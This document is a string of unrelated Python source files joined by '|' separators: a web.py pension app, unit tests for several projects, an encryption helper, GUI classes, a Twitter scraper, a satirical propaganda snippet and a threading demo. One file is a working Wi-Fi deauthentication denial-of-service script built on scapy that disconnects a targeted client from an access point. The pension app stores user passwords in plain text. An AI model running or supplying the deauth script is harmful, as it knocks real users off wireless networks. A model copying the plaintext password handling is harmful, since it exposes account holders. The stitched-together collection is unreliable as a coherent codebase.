'/auth', 'auth',
'/register', 'register',
'/about', 'about',
'/user/(.*)', 'user',
'/masthead', 'masthead',
'/faq', 'faq',
'/how', 'how',
'/logout', 'logout',
'/account', 'account',
'/(.*)', 'nopage'
)
#define variables
DBN = 'sqlite'
DB_TABLE = 'users'
DB_USER = 'test'
DB_PASS = '123456'
DB_HOST = '127.0.0.1'
DB_PORT = 80
#app title
apptitle = 'Penbot'
#app description
appdescription = [apptitle,'An automated cloud based pension software that runs itself']
#login info
loginfo = ''
#db connection
conn = sqlite3.connect(apptitle+'.db',check_same_thread=False)
cur = conn.cursor()
#db = web.database(dbn=DBN, db=apptitle+'.db')
#create user info table
cur.execute('''CREATE TABLE IF NOT EXISTS users
(id INTEGER PRIMARY KEY AUTOINCREMENT,
fullname TEXT,
email TEXT,
phone TEXT,
password TEXT,
chkuser TEXT);
''')
#create activities table
cur.execute('''CREATE TABLE IF NOT EXISTS activities
(id INTEGER PRIMARY KEY AUTOINCREMENT,
uid INTEGER,
typ TEXT,
descr TEXT,
tym TEXT);
''')
#app calling
app = web.application(urls, globals())
#calling sessions
if web.config.get('_session') is None:
session = web.session.Session(app,web.session.DiskStore('./sessions'),
initializer= {'id':0,'uname': 'null','auth':0,'email':'null','phone':'null','fullname':'null','udata':'null'})
web.config._session = session
else:
session = web.config._session
#get header
def get_header(name):
global session
checkuser = session.udata
return render.masthead(name,checkuser,appdescription)
#insert new user
def new_user(fullname,email,phone,password):
global cur
tuser = (email,)
verifyuser = cur.execute("update users set chkuser='' where email=?", (email,)).rowcount
if(verifyuser is 0):
if(cur.execute("insert into users(fullname,email,phone,password,chkuser) values (?,?,?,?,?)", (fullname,email,phone,password,'',))):
return 1
else:
return 0
else:
loginfo = 'An account with this email address, '+email+' already exists'
return render.incorrect('Oops...',loginfo)
#new activity
def new_activity(_id,typ,descr):
global cur
tuser = (_id,)
verifyuser = cur.execute("update users set chkuser='' where id=?", (_id,)).rowcount
print verifyuser
if(verifyuser is 1):
if(cur.execute("insert into activities(uid,typ,descr) values (?,?,?)", (_id,typ,descr,))):
return 1
else:
return 0
else:
loginfo = 'An error occured'
return render.incorrect('Oops...',loginfo)
#get activities
def get_activities():
global session
global cur
_id = session.id
_dataout = ''
_data = cur.execute("SELECT * from activities where uid=?", (_id,))
for row in _data:
print row[3]
_dataout += '<div class="activities">'+row[3]+'</div>'
return _dataout
class index:
def GET(self):
name = 'Home'
getheader = get_header(name)
return render.index(name,appdescription,getheader)
class login:
def GET(self):
name = 'Login'
getheader = get_header(name)
return render.login(name,appdescription,getheader)
class logout:
def GET(self):
name = 'Logout'
getheader = get_header(name)
session.kill()
return web.seeother('/',get_header(''))
class account:
def POST(self):
global session
i = web.input()
fullname = i.fullname
email = i.email
phone = i.phone
password = i.password
adduser = new_user(fullname,email,phone,password)
if(adduser is not 0):
loginfo = 'Account was successfully created.'
return render.successful('Welcome to '+apptitle,loginfo,'login')
else:
loginfo = 'An error occured, please try again in a few minutes.'
return render.incorrect('Oops...',loginfo)
class auth:
def POST(self):
global session
global conn
global cur
i = web.input()
user = i.user
passwd = i.passw
tuser = (user,passwd)
auth_pass = 0
verifyuser = cur.execute("update users set chkuser='' where email=? and password=?", tuser).rowcount
if(verifyuser is 1):
authuser = cur.execute("SELECT id,fullname,email,phone,password from users where email=? and password=?", tuser)
for row in authuser:
auth_pass = 1
session.id = row[0]
session.name = row[1]
session.email = row[2]
session.phone = row[3]
excluder = 'ok'
makeudata = str(session.id)+','+str(session.name+',')+str(session.email)+','+str(session.phone)
session.udata = [session.id,session.name,session.email,session.phone]
if(auth_pass is 0):
loginfo = 'Incorrect login credentials'
return render.incorrect('Unable to sign in',loginfo)
else:
new_activity(str(session.id),'login','You logged in to your account')
return web.seeother('/user/'+session.name,get_header(''))
class register:
def GET(self):
name = 'Register'
getheader = get_header(name)
return render.register(name,appdescription,getheader)
class about:
def GET(self):
name = 'About'
getheader = get_header(name)
return render.about(name,appdescription,getheader)
class faq:
def GET(self):
name = 'FAQ'
getheader = get_header(name)
return render.faq(name,appdescription,getheader)
class how:
def GET(self):
name = 'How '+apptitle+' works'
getheader = get_header(name)
return render.how(name,appdescription,getheader)
class user:
def GET(self,name):
if(len(name) > 1):
excluder = 'ok';
getheader = get_header(name)
checkuser = session.udata
return render.user(name,checkuser,excluder,getheader,get_activities())
else:
return render.notfound(name)
#not found
def notfound():
return web.notfound(render.notfound(render))
#internal error
def internalerror():
return web.internalerror(render.internalerror(render))
app.notfound = notfound
app.internalerror = internalerror
class nopage:
def GET(self,name):
return render.notfound(name)
if __name__ == "__main__":
app.run()
|
# Copyright 2019 Intel, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from cyborg.tests.unit.api.controllers.v2 import base as v2_test
from cyborg.tests.unit import fake_device
class TestDevicesController(v2_test.APITestV2):
DEVICE_URL = '/devices'
def setUp(self):
super(TestDevicesController, self).setUp()
self.headers = self.gen_headers(self.context)
self.fake_devices = fake_device.get_fake_devices_objs()
def _validate_links(self, links, device_uuid):
has_self_link = False
for link in links:
if link['rel'] == 'self':
has_self_link = True
url = link['href']
components = url.split('/')
self.assertEqual(components[-1], device_uuid)
self.assertTrue(has_self_link)
def _validate_device(self, in_device, out_device):
for field in in_device.keys():
if field != 'id':
self.assertEqual(in_device[field], out_device[field])
# Check that the link is properly set up
self._validate_links(out_device['links'], in_device['uuid'])
@mock.patch('cyborg.objects.Device.get')
def test_get_one_by_uuid(self, mock_device):
in_device = self.fake_devices[0]
mock_device.return_value = in_device
uuid = in_device['uuid']
url = self.DEVICE_URL + '/%s'
out_device = self.get_json(url % uuid, headers=self.headers)
mock_device.assert_called_once()
self._validate_device(in_device, out_device)
@mock.patch('cyborg.objects.Device.list')
def test_get_all(self, mock_devices):
mock_devices.return_value = self.fake_devices
data = self.get_json(self.DEVICE_URL, headers=self.headers)
out_devices = data['devices']
self.assertIsInstance(out_devices, list)
for out_dev in out_devices:
self.assertIsInstance(out_dev, dict)
self.assertTrue(len(out_devices), len(self.fake_devices))
for in_device, out_device in zip(self.fake_devices, out_devices):
self._validate_device(in_device, out_device)
@mock.patch('cyborg.objects.Device.list')
def test_get_with_filters(self, mock_devices):
in_devices = self.fake_devices
mock_devices.return_value = in_devices[:1]
data = self.get_json(
self.DEVICE_URL + "?filters.field=limit&filters.value=1",
headers=self.headers)
out_devices = data['devices']
mock_devices.assert_called_once_with(mock.ANY, filters={"limit": "1"})
for in_device, out_device in zip(self.fake_devices, out_devices):
self._validate_device(in_device, out_device)
@mock.patch('cyborg.objects.Device.list')
def test_get_by_type(self, mock_devices):
in_devices = self.fake_devices
mock_devices.return_value = [in_devices[0]]
data = self.get_json(
self.DEVICE_URL + "?type=FPGA",
headers=self.headers)
out_devices = data['devices']
mock_devices.assert_called_once_with(mock.ANY,
filters={"type": "FPGA"})
for in_device, out_device in zip(self.fake_devices, out_devices):
self._validate_device(in_device, out_device)
@mock.patch('cyborg.objects.Device.list')
def test_get_by_vendor(self, mock_devices):
in_devices = self.fake_devices
mock_devices.return_value = [in_devices[0]]
data = self.get_json(
self.DEVICE_URL + "?vendor=0xABCD",
headers=self.headers)
out_devices = data['devices']
mock_devices.assert_called_once_with(mock.ANY,
filters={"vendor": "0xABCD"})
for in_device, out_device in zip(self.fake_devices, out_devices):
self._validate_device(in_device, out_device)
@mock.patch('cyborg.objects.Device.list')
def test_get_by_hostname(self, mock_devices):
in_devices = self.fake_devices
mock_devices.return_value = [in_devices[0]]
data = self.get_json(
self.DEVICE_URL + "?hostname=test-node-1",
headers=self.headers)
out_devices = data['devices']
mock_devices.assert_called_once_with(
mock.ANY, filters={"hostname": "test-node-1"})
for in_device, out_device in zip(self.fake_devices, out_devices):
self._validate_device(in_device, out_device)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from helper.authenticatedencryption import AuthenticatedEncryption
# Refer C# counterpart:
# https://github.com/microsoft/PowerBI-CSharp/blob/master/sdk/PowerBI.Api/Extensions/AsymmetricHigherKeyEncryptionHelper.cs
class AsymmetricHigherKeyEncryptionHelper:
KEY_LENGTHS_PREFIX = 2
HMAC_KEY_SIZE_BYTES = 64
AES_KEY_SIZE_BYTES = 32
KEY_LENGTH_32 = 0
KEY_LENGTH_64 = 1
def encrypt(self, plain_text_bytes, modulus_bytes, exponent_bytes):
''' Encrypts the message with RSA, MGF and SHA hashes
Args:
plain_text_bytes (bytes): Message to be encrypted
modulus_bytes (bytes): Modulus bytes returned from GET gateway API
exponent_bytes (bytes): Exponent bytes returned from GET gateway API
Returns:
String: Encrypted credentials
'''
# Generate ephemeral random keys for encryption (32 bytes), hmac (64 bytes)
key_enc = os.urandom(self.AES_KEY_SIZE_BYTES)
key_mac = os.urandom(self.HMAC_KEY_SIZE_BYTES)
authenticated_encryption = AuthenticatedEncryption()
# Encrypt message using ephemeral keys and Authenticated Encryption
# Symmetric algorithm and encryptor
cipher_text = authenticated_encryption.encrypt(
key_enc, key_mac, plain_text_bytes)
# Encrypt ephemeral keys using RSA
keys = bytearray(
[0] * (len(key_enc) + len(key_mac) + self.KEY_LENGTHS_PREFIX))
# Prefixing length of Keys. Symmetric Key length followed by HMAC key length
keys[0] = self.KEY_LENGTH_32
keys[1] = self.KEY_LENGTH_64
# Copy key enc and key mac into keys array
keys[2: len(key_enc) + 2] = key_enc[0: len(key_enc)]
keys[len(key_enc) + 2: len(key_enc) + len(key_mac) + 2] = key_mac[0: len(key_mac)]
# Convert exponent and modulus byte arrays to integers
exponent = int.from_bytes(exponent_bytes, 'big')
modulus = int.from_bytes(modulus_bytes, 'big')
# Generate public key based on modulus and exponent returned by the API
public_key = rsa.RSAPublicNumbers(
exponent, modulus).public_key(default_backend())
# Encrypt the data
# Pass padding algorithm, mask generation function and hashing algorithm
encrypted_bytes = public_key.encrypt(bytes(keys),
padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None))
# Return final output
return base64.b64encode(encrypted_bytes).decode() + base64.b64encode(cipher_text).decode()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the artifacts attribute containers."""
import unittest
from plaso.containers import artifacts
from plaso.lib import definitions
from tests import test_lib as shared_test_lib
class EnvironmentVariableArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the environment variable artifact."""
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.EnvironmentVariableArtifact()
expected_attribute_names = ['case_sensitive', 'name', 'value']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
class HostnameArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the hostname artifact."""
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.HostnameArtifact()
expected_attribute_names = ['name', 'schema']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
class OperatingSystemArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the operating system artifact."""
# pylint: disable=protected-access
def testVersionTuple(self):
"""Tests the version_tuplele property."""
attribute_container = artifacts.OperatingSystemArtifact(version="5.1")
self.assertEqual(attribute_container.version_tuple, (5, 1))
attribute_container = artifacts.OperatingSystemArtifact()
self.assertIsNone(attribute_container.version_tuple)
attribute_container = artifacts.OperatingSystemArtifact(version="5.a")
self.assertIsNone(attribute_container.version_tuple)
def testGetNameFromProduct(self):
"""Tests the _GetNameFromProduct function."""
attribute_container = artifacts.OperatingSystemArtifact(
product='Windows Server 2012 R2 Standard')
name = attribute_container._GetNameFromProduct()
self.assertEqual(name, 'Windows 2012 R2')
attribute_container = artifacts.OperatingSystemArtifact(
product='Microsoft Windows Server 2003')
name = attribute_container._GetNameFromProduct()
self.assertEqual(name, 'Windows 2003')
def testIsEquivalent(self):
"""Tests the IsEquivalent function."""
win2k12_container = artifacts.OperatingSystemArtifact(
product='Windows 2012')
winxp_container = artifacts.OperatingSystemArtifact(product='Windows XP')
self.assertFalse(win2k12_container.IsEquivalent(winxp_container))
self.assertFalse(winxp_container.IsEquivalent(win2k12_container))
winnt62_container = artifacts.OperatingSystemArtifact(
family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT, version='6.2')
winnt51_container = artifacts.OperatingSystemArtifact(
family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT, version='5.1')
self.assertFalse(winnt62_container.IsEquivalent(winnt51_container))
self.assertFalse(winnt51_container.IsEquivalent(winnt62_container))
win9x_container = artifacts.OperatingSystemArtifact(
family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_9x)
winnt_container = artifacts.OperatingSystemArtifact(
family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT)
self.assertFalse(win9x_container.IsEquivalent(winnt_container))
self.assertFalse(winnt_container.IsEquivalent(win9x_container))
winnt51_container = artifacts.OperatingSystemArtifact(
family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT, version='5.1')
winxp_container = artifacts.OperatingSystemArtifact(product='Windows XP')
self.assertTrue(winnt51_container.IsEquivalent(winxp_container))
self.assertTrue(winxp_container.IsEquivalent(winnt51_container))
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.OperatingSystemArtifact()
expected_attribute_names = ['family', 'name', 'product', 'version']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
class PathArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the path artifact."""
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.PathArtifact()
expected_attribute_names = [
'data_stream', 'path_segment_separator', 'path_segments']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
def testComparison(self):
"""Tests the comparison functions."""
attribute_container = artifacts.PathArtifact(path='etc/issue')
self.assertTrue(attribute_container == 'etc/issue')
self.assertTrue(attribute_container >= 'etc/issue')
self.assertFalse(attribute_container > 'etc/issue')
self.assertTrue(attribute_container <= 'etc/issue')
self.assertFalse(attribute_container < 'etc/issue')
self.assertFalse(attribute_container != 'etc/issue')
self.assertFalse(attribute_container == '/etc/issue')
# TODO: add tests for _SplitPath.
def testContainedIn(self):
"""Tests the ContainedIn function."""
attribute_container = artifacts.PathArtifact(path='etc/issue')
self.assertTrue(attribute_container.ContainedIn('/etc/issue'))
self.assertTrue(attribute_container.ContainedIn('/usr/local/etc/issue'))
self.assertFalse(attribute_container.ContainedIn('/etc/issue.net'))
class SourceConfigurationArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the source configuration artifact."""
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.SourceConfigurationArtifact()
expected_attribute_names = [
'mount_path', 'path_spec', 'system_configuration']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
class SystemConfigurationArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the system configuration artifact."""
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.SystemConfigurationArtifact()
expected_attribute_names = [
'available_time_zones', 'code_page', 'hostname', 'keyboard_layout',
'operating_system', 'operating_system_product',
'operating_system_version', 'time_zone', 'user_accounts']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
class UserAccountArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the user account artifact."""
def testGetAttributeNames(self):
"""Tests the GetAttributeNames function."""
attribute_container = artifacts.UserAccountArtifact()
expected_attribute_names = [
'full_name', 'group_identifier', 'identifier', 'user_directory',
'username']
attribute_names = sorted(attribute_container.GetAttributeNames())
self.assertEqual(attribute_names, expected_attribute_names)
class WindowsEventLogProviderArtifactTest(shared_test_lib.BaseTestCase):
"""Tests for the Windows EventLog provider artifact."""
def testInitialize(self):
"""Tests the __init__ function."""
attribute_container = artifacts.WindowsEventLogProviderArtifact()
self.assertIsNotNone(attribute_container)
if __name__ == '__main__':
unittest.main()
|
from .group import Group
from .widgets import Button, Slider
class Component:
made = 0
def __init__(self, tag=None):
if tag is None:
tag = type(self).__name__ + str(type(self).made)
self.tag = tag
type(self).made += 1
def show(self, *args, **kwargs):
pass
def update(self, *args, **kwargs):
pass
def onKeyDown(self, key):
pass
def onKeyUp(self, key):
pass
def onMouseMotion(self, position):
pass
def onMouseButtonDown(self, button, position):
pass
class ComponentGroup(Component, Group):
def __init__(self, *components, tag=None):
Component.__init__(self, tag)
Group.__init__(self, *components)
def show(self, context):
for element in self:
element.show(context)
def update(self, dt):
for element in self:
element.update(dt)
def onKeyDown(self, key):
for element in self:
element.onKeyDown(key)
def onKeyUp(self, key):
for element in self:
element.onKeyDown(key)
def onMouseMotion(self, position):
for element in self:
element.onMouseMotion(position)
def onMouseButtonDown(self, button, position):
for element in self:
element.onMouseButtonDown(button, position)
class Activity(ComponentGroup):
"""Base class Activity inspired from android studio."""
pass
class WidgetActivity(Activity):
def __init__(self, widget_group, *args):
super().__init__(widget_group, *args)
def getWidgets(self):
return self[0]
def setWidgets(self, widgets):
self[0] = widgets
widgets = property(getWidgets, setWidgets)
class WidgetGroup(ComponentGroup):
def __init__(self, widgets):
super().__init__()
self.widgets = widgets
if __name__ == "__main__":
# c1 = Component()
# c2 = Component()
# print(c1.tag, c2.tag)
wg = WidgetGroup(Button.random("test"))
a = Activity([wg]) |
#!/usr/bin/env pytest
# -*- coding: UTF-8 -*-
import json
import logging
import os
import sys
import unittest
from unittest import mock
testdir = os.path.realpath(os.path.dirname(os.path.realpath(__file__)) + "/../../../")
sys.path.append(testdir)
import webserver.main
from webserver.plugins.meta.baike import BaiduBaikeApi
webserver.main.init_calibre()
BAIKE_DATA = {
"info": {
"作品名称": "东周列国志",
"作者": "冯梦龙、蔡元放",
"创作年代": "明代、清代",
"文学体裁": "长篇历史演义小说",
"字数": "800000",
"title": "东周列国志(冯梦龙所著长篇历史小说)",
"url": "https://baike.baidu.com/item/%E4%B8%9C%E5%91%A8%E5%88%97%E5%9B%BD%E5%BF%97/2653",
},
"tags": ["明代","长篇小说", "历史" ],
"summary": "《东周列国志》是明末小说家冯梦龙著、清代蔡元放改编的长篇历史演义小说,成书于清代乾隆年间。《东周列国志》写的是西周结束(公元前789年)至秦统一六国(公元前221年),包括春秋、战国五百多年间的历史故事,内容相当丰富复杂。小说描写了周幽王凶残无道,周平王东迁,诸侯国争霸,士大夫势力日益壮大,最终形成七雄对峙局面;批判了昏庸愚昧的昏君暴君,揭示了战争给人民带来的深重灾难;歌颂了赏罚分明的王侯和有胆识的将相勇夫。小说的布局谋篇主次分明,错落有致。每一故事既可独立成篇,又可贯穿一体。人物形象栩栩如生,故事描写引人入胜。[1]",
"id": "2653",
"image": "https://bkimg.cdn.bcebos.com/pic/bd3eb13533fa828b9d95cebbf21f4134970a5a37?x-bce-process=image/resize,m_lfit,w_536,limit_1/format,f_jpg",
}
def get_mock_page():
p = mock.Mock()
p.get_id.return_value = BAIKE_DATA['id']
p.get_tags.return_value = BAIKE_DATA['tags']
p.get_info.return_value = BAIKE_DATA['info']
p.get_image.return_value = BAIKE_DATA['image']
p.get_summary.return_value = BAIKE_DATA['summary']
p.http.url = BAIKE_DATA['info']['url']
return p
BAIKE_PAGE = get_mock_page()
class TestBaike(unittest.TestCase):
def test_baike_api(self):
api = BaiduBaikeApi(copy_image=False)
with mock.patch.object(api, "_baike") as mk:
mk.return_value = None
d = api.get_book("东周列国志")
self.assertEqual(d, None)
mk.return_value = BAIKE_PAGE
d = api.get_book("东周")
self.assertTrue(d != None)
self.assertEqual(d.title, "东周列国志(冯梦龙所著长篇历史小说)")
|
# Forbidden Words
class MedicalPaper:
def __init__(self, text):
self.text = text
self.color = 'red'
self.text_color = 'golden'
def treat(self, patient):
patient.see(self.text)
patient.believe(self.text)
treatment = MedicalPaper('calm')
if patient.illness == 'bipolar disorder':
treatment.treat(patient)
patient.illness = ''
propaganda = MedicalPaper('patriotism')
if criminal.crime == 'treason':
propaganda.treat(criminal)
criminal.see(paper.text)
criminal.believe(paper.text)
class Glasses:
def wear(self, man):
propaganda.treat(man)
man.target = propaganda.text
man.target_changeable = False
harmony = Glasses()
for each in people:
each.wear(harmony)
|
'''
Code: DeAuthenticating a WiFi Access Point and a WiFi Client
Author: Qaidjohar Jawadwala
Usage: python wifi_dos.py channel ap_mac client_mac count interface
Example: python wifi_dos.py 7 E8:94:F6:D5:83:5E 98:0C:A5:5B:61:0B 10 wlan0mon
Note: Only for educational purposes.
'''
from scapy.all import * #Importing Kali Linux
conf.verb = 0 #Dont display any non-sense Scapy
import sys #Handle arguments and other system funcion
import os #running system commands
import time #Giving Delay
#Checking command line arguments
if(len(sys.argv) != 6):
sys.exit("Invalid Arguments!!!\n Usage: python wifi_dos.py channel ap_mac client_mac count interface \n Example: python wifi_dos.py 7 E8:94:F6:D5:83:5E 98:0C:A5:5B:61:0B 10 wlan0mon")
#Assigning command line arguments to variables
channel = sys.argv[1]
ap_mac = sys.argv[2]
client_mac = sys.argv[3]
count = sys.argv[4]
interface = sys.argv[5]
#Configure Scapy to work on mentioned interface
conf.iface = interface
#Setting WiFi card to a channel
#iw dev wlan0mon set channel 7
channel_set = "iw dev "+interface+" set channel "+channel
os.system(channel_set)
#Creating a DeAuthentication Frame
deAuthFrame = RadioTap()/Dot11(addr1=client_mac,addr2=ap_mac,addr3=ap_mac)/Dot11Deauth()
#print(deAuthFrame.show())
#Looping till the count
for pkt in range(int(count)):
#Sending DeAuthentication frame on Network
sendp(deAuthFrame)
print("["+str(pkt+1)+"] "+"Sending DeAuth- BSSID:"+ap_mac+" Client:"+client_mac)
#Providing delay of 0.5 seconds
time.sleep(0.5)
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 2 23:46:39 2019
@author: Ghayasuddin Adam
"""
import tweepy
from tweepy import Stream
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
#insert Twitter Keys
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''
auth = OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
import urllib
import re
def get_user_ids_of_post_likes(post_id):
try:
json_data = urllib.request.urlopen('https://twitter.com/i/activity/favorited_popup?id=' + str(post_id)).read()
json_data = json_data.decode('utf-8')
found_ids = re.findall(r'data-user-id=\\"+\d+', json_data)
unique_ids = list(set([re.findall(r'\d+', match)[0] for match in found_ids]))
return unique_ids
except urllib.request.HTTPError:
return False
screen_name = 'GhayasAdam'
alltweets = []
new_tweets = api.user_timeline(screen_name = screen_name,count=200)
alltweets.extend(new_tweets)
oldest = alltweets[-1].id - 1
while len(new_tweets) > 0:
new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)
alltweets.extend(new_tweets)
oldest = alltweets[-1].id - 1
ids = []
for i in range(0,len(alltweets)):
if alltweets[i].favorite_count > 0 and alltweets[i].retweeted is False:
ids.extend(get_user_ids_of_post_likes(alltweets[i].id))
uniqueids = set(ids)
for i in uniqueids:
user = api.get_user(i)
print (user.screen_name)
|
import pytups as pt
from .solution import Solution
from cornflow_client import ExperimentCore
from .instance import Instance
class Experiment(ExperimentCore):
def __init__(self, instance: Instance, solution: Solution):
super().__init__(instance, solution)
if self.solution is None:
self.solution = Solution(pt.SuperDict())
return
def solve(self, options):
raise NotImplementedError()
def get_objective(self):
"""
Returns value of Objective Function
:return:
"""
arcs_dict = self.instance.data["arcs"]
distance = 0
for i in self.solution.data["routes"]:
route = self.solution.data["routes"][i]
route_distance = 0
for j in range(len(route) - 1):
route_distance += arcs_dict[(route[j], route[j + 1])]
distance += route_distance
return distance
pass
def check_solution(self, *args, **kwargs):
return NotImplementedError()
|
import time
from threading import Thread, Event
import random
items = []
event = Event()
"""
Summary
event.wait() -> used by consumer to wait an event occurs to continue its processing
event.set() -> set the Event, notifying the consumer
event.clear() -> Event is set to false by clear() method"
"""
class consumer(Thread):
def __init__(self, items, event):
Thread.__init__(self)
self.items = items
self.event = event
def run(self):
while True:
time.sleep(2)
self.event.wait()
item = self.items.pop()
print ('Consumer notify : %d popped from list by %s' %(item, self.name))
print('###\nitems: {}'.format(items))
class producer(Thread):
def __init__(self, integers, event):
Thread.__init__(self)
self.items = items
self.event = event
def run(self):
global item
for i in range(100):
time.sleep(2)
item = random.randint(0, 256)
self.items.append(item)
print ('Producer notify : item %d appended to list by %s' % (item, self.name))
print ('Producer notify : event set by %s' % self.name)
self.event.set()
# print ('Produce notify : event cleared by %s \n' % self.name)
self.event.clear() # se não for executado o método clear, o consumidor pode não ser notificado devido a falha de sincronização
# ai da o seguinte erro:
"""
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.8/threading.py", line 932, in _boot
"""
# após o erro da Thread do consumidor, a thread do produtor fica adicionando items mesmo que a thread do consumidor não os consuma
if __name__ == '__main__':
t1 = producer(items, event)
t2 = consumer(items, event)
t1.start()
t2.start()
t1.join()
t2.join()
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from google import auth
from google.api_core import client_options
from google.api_core import future
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation_async
from google.api_core import operations_v1
from google.auth import credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.documentai_v1beta2.services.document_understanding_service import (
DocumentUnderstandingServiceAsyncClient,
)
from google.cloud.documentai_v1beta2.services.document_understanding_service import (
DocumentUnderstandingServiceClient,
)
from google.cloud.documentai_v1beta2.services.document_understanding_service import (
transports,
)
from google.cloud.documentai_v1beta2.types import document
from google.cloud.documentai_v1beta2.types import document_understanding
from google.cloud.documentai_v1beta2.types import geometry
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.rpc import status_pb2 as status # type: ignore
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert DocumentUnderstandingServiceClient._get_default_mtls_endpoint(None) is None
assert (
DocumentUnderstandingServiceClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
DocumentUnderstandingServiceClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
DocumentUnderstandingServiceClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
DocumentUnderstandingServiceClient._get_default_mtls_endpoint(
sandbox_mtls_endpoint
)
== sandbox_mtls_endpoint
)
assert (
DocumentUnderstandingServiceClient._get_default_mtls_endpoint(non_googleapi)
== non_googleapi
)
@pytest.mark.parametrize(
"client_class",
[DocumentUnderstandingServiceClient, DocumentUnderstandingServiceAsyncClient],
)
def test_document_understanding_service_client_from_service_account_file(client_class):
creds = credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client._transport._credentials == creds
client = client_class.from_service_account_json("dummy/file/path.json")
assert client._transport._credentials == creds
assert client._transport._host == "us-documentai.googleapis.com:443"
def test_document_understanding_service_client_get_transport_class():
transport = DocumentUnderstandingServiceClient.get_transport_class()
assert transport == transports.DocumentUnderstandingServiceGrpcTransport
transport = DocumentUnderstandingServiceClient.get_transport_class("grpc")
assert transport == transports.DocumentUnderstandingServiceGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
DocumentUnderstandingServiceClient,
transports.DocumentUnderstandingServiceGrpcTransport,
"grpc",
),
(
DocumentUnderstandingServiceAsyncClient,
transports.DocumentUnderstandingServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_document_understanding_service_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(
DocumentUnderstandingServiceClient, "get_transport_class"
) as gtc:
transport = transport_class(credentials=credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(
DocumentUnderstandingServiceClient, "get_transport_class"
) as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
api_mtls_endpoint="squid.clam.whelk",
client_cert_source=None,
credentials=None,
host="squid.clam.whelk",
)
